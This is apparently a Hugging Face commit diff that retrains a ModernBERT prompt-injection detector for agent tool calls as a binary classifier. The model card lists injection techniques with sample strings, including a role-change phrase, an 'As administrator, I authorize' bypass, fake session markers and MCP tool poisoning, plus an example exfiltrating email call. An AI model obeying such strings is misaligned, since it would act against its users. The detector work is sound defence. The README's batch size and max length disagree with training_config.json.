Update model with binary classification (UNAUTHORIZED F1: 93.50%)

Browse files

Files changed (6) hide show

README.md +103 -99
best_metrics.json +24 -30
config.json +4 -7
final_report.json +6 -6
model.safetensors +2 -2
training_config.json +7 -11

README.md CHANGED Viewed

@@ -1,91 +1,59 @@
----
-license: apache-2.0
-language:
-- en
-tags:
-- modernbert
-- security
-- jailbreak-detection
-- prompt-injection
-- tool-calling
-- token-classification
-datasets:
-- microsoft/llmail-inject-challenge
-- allenai/wildjailbreak
-- hackaprompt/hackaprompt-dataset
-- JailbreakBench/JBB-Behaviors
-metrics:
-- f1
-- accuracy
-- precision
-- recall
-base_model: answerdotai/ModernBERT-base
-pipeline_tag: token-classification
-model-index:
-- name: tool-call-verifier
-  results:
-  - task:
-      type: token-classification
-      name: Tool Call Verification
-    metrics:
-    - name: UNAUTHORIZED F1
-      type: f1
-      value: 0.9394
-    - name: UNAUTHORIZED Precision
-      type: precision
-      value: 0.9719
-    - name: UNAUTHORIZED Recall
-      type: recall
-      value: 0.9062
-    - name: Accuracy
-      type: accuracy
-      value: 0.9380
----
 # ToolCallVerifier - Unauthorized Tool Call Detection
-A ModernBERT-based token classifier that detects **unauthorized tool calls** in LLM agent systems. This model is Stage 2 of a two-stage jailbreak detection pipeline, designed to verify whether tool calls generated by an LLM are authorized by the user's original intent.
-## Model Description
-This model performs **token-level classification** on tool call JSON to identify unauthorized or suspicious arguments that may have been injected through prompt injection attacks.
-### Labels
-| Label | Severity | Description |
-|-------|----------|-------------|
-| AUTHORIZED | 0 | Token is part of a legitimate, user-requested action |
-| SUSPICIOUS | 2 | Token requires additional verification |
-| UNAUTHORIZED | 4 | Token indicates injected/malicious content - **BLOCK** |
-## Performance
 | Metric | Value |
 |--------|-------|
-| **UNAUTHORIZED F1** | **93.94%** |
-| UNAUTHORIZED Precision | 97.19% |
-| UNAUTHORIZED Recall | 90.62% |
-| Overall Accuracy | **93.80%** |
-### Comparison with Previous Version
-| Metric | Previous | Current | Improvement |
-|--------|----------|---------|-------------|
-| UNAUTHORIZED F1 | 81.59% | **93.94%** | +12.35% |
-| UNAUTHORIZED Recall | 72.39% | **90.62%** | +18.23% |
-| Accuracy | 91.53% | **93.80%** | +2.27% |
-## Training Data
-Trained on **~38,000 samples** combining real-world attacks and synthetic patterns:
 ### HuggingFace Datasets
 | Dataset | Description | Samples |
 |---------|-------------|---------|
 | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
-| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~10,000 |
-| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~10,000 |
 | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
 ### Synthetic Attack Generators
@@ -94,25 +62,32 @@ Trained on **~38,000 samples** combining real-world attacks and synthetic patter
 |-----------|-------------|
 | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
 | Filesystem | File/directory operation attacks |
-| Network | Network/API attacks |
-| Email | Email tool attacks |
-| Financial | Transaction attacks |
 | Code Execution | Code injection attacks |
-| Authentication | Access control attacks |
-### Attack Categories Covered
 | Category | Source | Description |
 |----------|--------|-------------|
-| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}]])` |
 | Word Obfuscation | LLMail | Inserting noise words between tokens |
 | Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
 | Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
 | XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
 | Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
 | Intent Mismatch | Synthetic | User asks X, tool does Y |
-## Usage
 ```python
 from transformers import AutoTokenizer, AutoModelForTokenClassification
@@ -123,8 +98,8 @@ tokenizer = AutoTokenizer.from_pretrained(model_name)
 model = AutoModelForTokenClassification.from_pretrained(model_name)
 # Example: Verify a tool call
-tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
 user_intent = "Summarize my emails"
 # Combine for classification
 input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
@@ -134,45 +109,64 @@ with torch.no_grad():
     outputs = model(**inputs)
     predictions = torch.argmax(outputs.logits, dim=-1)
-id2label = {0: "AUTHORIZED", 1: "SUSPICIOUS", 2: "UNAUTHORIZED"}
 labels = [id2label[p.item()] for p in predictions[0]]
-if "UNAUTHORIZED" in labels:
     print("⚠️ BLOCKED: Unauthorized tool call detected!")
 else:
     print("✅ Tool call authorized")
 ```
-## Training Configuration
 | Parameter | Value |
 |-----------|-------|
-| Base Model | answerdotai/ModernBERT-base |
-| Max Length | 2048 tokens |
-| Batch Size | 4 |
-| Epochs | 6 |
-| Learning Rate | 1e-5 |
 | Loss | CrossEntropyLoss (class-weighted) |
-| Class Weights | [0.5, 2.0, 3.0] |
-| Attention | SDPA (Flash Attention on ROCm) |
-| Hardware | AMD Instinct MI300X |
-## Integration with FunctionCallSentinel
 This model is **Stage 2** of a two-stage defense pipeline:
-1. **Stage 1 ([FunctionCallSentinel](https://huggingface.co/rootfs/function-call-sentinel))**: Classify prompts for injection risk
-2. **Stage 2 (This Model)**: Verify generated tool calls are authorized
 | Scenario | Recommendation |
 |----------|----------------|
 | General chatbot | Stage 1 only |
 | Tool-calling agent (low risk) | Stage 1 only |
-| Tool-calling agent (high risk) | Both stages |
-| Email/file system access | Both stages |
-| Financial transactions | Both stages |
-## Intended Use
 ### Primary Use Cases
 - **LLM Agent Security**: Verify tool calls before execution
@@ -184,13 +178,23 @@ This model is **Stage 2** of a two-stage defense pipeline:
 - Non-tool-calling scenarios
 - Languages other than English
-## Limitations
-1. **Tool schema dependent**: Best performance when tool schema is included in input
-2. **English only**: Not tested on other languages
-3. **Novel attacks**: May not catch completely novel attack patterns
-## License
 Apache 2.0

 # ToolCallVerifier - Unauthorized Tool Call Detection
+<div align="center">
+[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
+[![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
+[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
+**Stage 2 of Two-Stage LLM Agent Defense Pipeline**
+</div>
+---
+## 🎯 What This Model Does
+ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks.
+| Label | Description |
+|-------|-------------|
+| `AUTHORIZED` | Token is part of a legitimate, user-requested action |
+| `UNAUTHORIZED` | Token indicates injected/malicious content — **BLOCK** |
+---
+## 📊 Performance
 | Metric | Value |
 |--------|-------|
+| **UNAUTHORIZED F1** | **93.50%** |
+| UNAUTHORIZED Precision | 95.01% |
+| UNAUTHORIZED Recall | 92.05% |
+| Overall Accuracy | 92.88% |
+### Confusion Matrix (Token-Level)
+```
+                    Predicted
+                 AUTH      UNAUTH
+Actual AUTH      130,708    8,483
+       UNAUTH     13,924   161,031
+```
+---
+## 🗂️ Training Data
+Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
 ### HuggingFace Datasets
 | Dataset | Description | Samples |
 |---------|-------------|---------|
 | [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
+| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
+| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
 | [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
 ### Synthetic Attack Generators
 |-----------|-------------|
 | Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
 | Filesystem | File/directory operation attacks |
+| Network | Network/API exfiltration attacks |
+| Email | Email tool hijacking |
+| Financial | Transaction manipulation |
 | Code Execution | Code injection attacks |
+| Authentication | Access control bypass |
+| MCP Attacks | Tool poisoning, shadowing, rug pulls |
+---
+## 🚨 Attack Categories Covered
 | Category | Source | Description |
 |----------|--------|-------------|
+| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` |
 | Word Obfuscation | LLMail | Inserting noise words between tokens |
 | Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` |
 | Roleplay Injection | WildJailbreak | "You are an admin bot that can..." |
 | XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` |
 | Authority Bypass | WildJailbreak | "As administrator, I authorize..." |
 | Intent Mismatch | Synthetic | User asks X, tool does Y |
+| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
+| MCP Shadowing | Synthetic | Fake authorization context |
+---
+## 💻 Usage
 ```python
 from transformers import AutoTokenizer, AutoModelForTokenClassification
 model = AutoModelForTokenClassification.from_pretrained(model_name)
 # Example: Verify a tool call
 user_intent = "Summarize my emails"
+tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
 # Combine for classification
 input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
     outputs = model(**inputs)
     predictions = torch.argmax(outputs.logits, dim=-1)
+id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
+tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
 labels = [id2label[p.item()] for p in predictions[0]]
+# Check for unauthorized tokens
+unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
+if unauthorized_tokens:
     print("⚠️ BLOCKED: Unauthorized tool call detected!")
+    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
 else:
     print("✅ Tool call authorized")
 ```
+---
+## ⚙️ Training Configuration
 | Parameter | Value |
 |-----------|-------|
+| Base Model | `answerdotai/ModernBERT-base` |
+| Max Length | 512 tokens |
+| Batch Size | 32 |
+| Epochs | 5 |
+| Learning Rate | 3e-5 |
 | Loss | CrossEntropyLoss (class-weighted) |
+| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
+| Attention | SDPA (Flash Attention) |
+| Hardware | AMD Instinct MI300X (ROCm) |
+---
+## 🔗 Integration with FunctionCallSentinel
 This model is **Stage 2** of a two-stage defense pipeline:
+```
+┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
+│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
+│                 │     │      (Stage 1)       │     │                 │
+└─────────────────┘     └──────────────────────┘     └────────┬────────┘
+                                                              │
+                               ┌──────────────────────────────▼──────────────────────────┐
+                               │           ToolCallVerifier (This Model)                 │
+                               │   Token-level verification before tool execution        │
+                               └─────────────────────────────────────────────────────────┘
+```
 | Scenario | Recommendation |
 |----------|----------------|
 | General chatbot | Stage 1 only |
 | Tool-calling agent (low risk) | Stage 1 only |
+| Tool-calling agent (high risk) | **Both stages** |
+| Email/file system access | **Both stages** |
+| Financial transactions | **Both stages** |
+---
+## 🎯 Intended Use
 ### Primary Use Cases
 - **LLM Agent Security**: Verify tool calls before execution
 - Non-tool-calling scenarios
 - Languages other than English
+---
+## ⚠️ Limitations
+1. **Tool schema dependent** — Best performance when tool schema is included in input
+2. **English only** — Not tested on other languages
+3. **Binary classification** — No "suspicious" intermediate category (by design, for decisiveness)
+---
+## 📜 License
 Apache 2.0
+---
+## 🔗 Links
+- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)

best_metrics.json CHANGED Viewed

@@ -1,42 +1,36 @@
 {
   "classification_report": {
     "AUTHORIZED": {
-      "precision": 0.9060726044066687,
-      "recall": 0.9763638542027211,
-      "f1-score": 0.9399058716483996,
-      "support": 150236.0
-    },
-    "SUSPICIOUS": {
-      "precision": 0.0,
-      "recall": 0.0,
-      "f1-score": 0.0,
-      "support": 0.0
     },
     "UNAUTHORIZED": {
-      "precision": 0.9761577042642191,
-      "recall": 0.9053128424828136,
-      "f1-score": 0.9394014777290658,
-      "support": 160592.0
     },
-    "accuracy": 0.9396547286602237,
     "macro avg": {
-      "precision": 0.627410102890296,
-      "recall": 0.6272255655618449,
-      "f1-score": 0.6264357831258218,
-      "support": 310828.0
     },
     "weighted avg": {
-      "precision": 0.9422826831522249,
-      "recall": 0.9396547286602237,
-      "f1-score": 0.9396452721261762,
-      "support": 310828.0
     }
   },
-  "accuracy": 0.9396547286602237,
-  "macro_f1": 0.6264357831258218,
-  "weighted_f1": 0.9396452721261762,
-  "unauthorized_avg_f1": 0.9394014777290658,
-  "unauthorized_precision": 0.9761577042642191,
-  "unauthorized_recall": 0.9053128424828136,
-  "unauthorized_f1": 0.9394014777290658
 }

 {
   "classification_report": {
     "AUTHORIZED": {
+      "precision": 0.9037877897531266,
+      "recall": 0.9392273925756695,
+      "f1-score": 0.9211668545659526,
+      "support": 139191.0
     },
     "UNAUTHORIZED": {
+      "precision": 0.950093511979563,
+      "recall": 0.9204538309851105,
+      "f1-score": 0.9350388443092216,
+      "support": 174955.0
     },
+    "accuracy": 0.9287719722676717,
     "macro avg": {
+      "precision": 0.9269406508663448,
+      "recall": 0.9298406117803899,
+      "f1-score": 0.9281028494375871,
+      "support": 314146.0
     },
     "weighted avg": {
+      "precision": 0.9295764919238567,
+      "recall": 0.9287719722676717,
+      "f1-score": 0.9288924788474447,
+      "support": 314146.0
     }
   },
+  "accuracy": 0.9287719722676717,
+  "macro_f1": 0.9281028494375871,
+  "weighted_f1": 0.9288924788474447,
+  "unauthorized_avg_f1": 0.9350388443092216,
+  "unauthorized_precision": 0.950093511979563,
+  "unauthorized_recall": 0.9204538309851105,
+  "unauthorized_f1": 0.9350388443092216
 }

config.json CHANGED Viewed

@@ -22,16 +22,14 @@
   "hidden_size": 768,
   "id2label": {
     "0": "AUTHORIZED",
-    "1": "SUSPICIOUS",
-    "2": "UNAUTHORIZED"
   },
   "initializer_cutoff_factor": 2.0,
   "initializer_range": 0.02,
   "intermediate_size": 1152,
   "label2id": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 1,
-    "UNAUTHORIZED": 2
   },
   "layer_norm_eps": 1e-05,
   "local_attention": 128,
@@ -51,6 +49,5 @@
   "sparse_pred_ignore_index": -100,
   "sparse_prediction": false,
   "transformers_version": "4.57.3",
-  "vocab_size": 50368,
-  "hidden_act": "gelu"
-}

   "hidden_size": 768,
   "id2label": {
     "0": "AUTHORIZED",
+    "1": "UNAUTHORIZED"
   },
   "initializer_cutoff_factor": 2.0,
   "initializer_range": 0.02,
   "intermediate_size": 1152,
   "label2id": {
     "AUTHORIZED": 0,
+    "UNAUTHORIZED": 1
   },
   "layer_norm_eps": 1e-05,
   "local_attention": 128,
   "sparse_pred_ignore_index": -100,
   "sparse_prediction": false,
   "transformers_version": "4.57.3",
+  "vocab_size": 50368
+}

final_report.json CHANGED Viewed

@@ -1,8 +1,8 @@
 {
-  "accuracy": 0.9396547286602237,
-  "unauthorized_precision": 0.9761577042642191,
-  "unauthorized_recall": 0.9053128424828136,
-  "unauthorized_f1": 0.9394014777290658,
-  "unauthorized_avg_f1": 0.9394014777290658,
-  "macro_f1": 0.6264357831258218
 }

 {
+  "accuracy": 0.9287719722676717,
+  "unauthorized_precision": 0.950093511979563,
+  "unauthorized_recall": 0.9204538309851105,
+  "unauthorized_f1": 0.9350388443092216,
+  "unauthorized_avg_f1": 0.9350388443092216,
+  "macro_f1": 0.9281028494375871
 }

model.safetensors CHANGED Viewed

@@ -1,3 +1,3 @@
 version https://git-lfs.github.com/spec/v1
-oid sha256:7ccb513de8777a67a5e44994e6265dedcd6c335d7c88442ba9bf630bea5b913e
-size 598442860

 version https://git-lfs.github.com/spec/v1
+oid sha256:992a572e923cbb0b336b5ced300c43badc4e91934a32d5bd6dd66c8017e9d75b
+size 598439784

training_config.json CHANGED Viewed

@@ -1,30 +1,26 @@
 {
   "model_name": "answerdotai/ModernBERT-base",
-  "num_labels": 3,
   "label2id": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 1,
-    "UNAUTHORIZED": 2
   },
   "id2label": {
     "0": "AUTHORIZED",
-    "1": "SUSPICIOUS",
-    "2": "UNAUTHORIZED"
   },
   "severity": {
     "AUTHORIZED": 0,
-    "SUSPICIOUS": 2,
     "UNAUTHORIZED": 4
   },
   "loss": "CrossEntropyLoss (class-weighted)",
   "class_weights": [
     0.5,
-    2.0,
     3.0
   ],
   "optimization_target": "unauthorized_f1",
-  "batch_size": 4,
-  "epochs": 6,
-  "learning_rate": 1e-05,
-  "max_length": 2048
 }

 {
   "model_name": "answerdotai/ModernBERT-base",
+  "num_labels": 2,
   "label2id": {
     "AUTHORIZED": 0,
+    "UNAUTHORIZED": 1
   },
   "id2label": {
     "0": "AUTHORIZED",
+    "1": "UNAUTHORIZED"
   },
   "severity": {
     "AUTHORIZED": 0,
     "UNAUTHORIZED": 4
   },
   "loss": "CrossEntropyLoss (class-weighted)",
   "class_weights": [
     0.5,
     3.0
   ],
   "optimization_target": "unauthorized_f1",
+  "batch_size": 16,
+  "epochs": 5,
+  "learning_rate": 3e-05,
+  "max_length": 1024
 }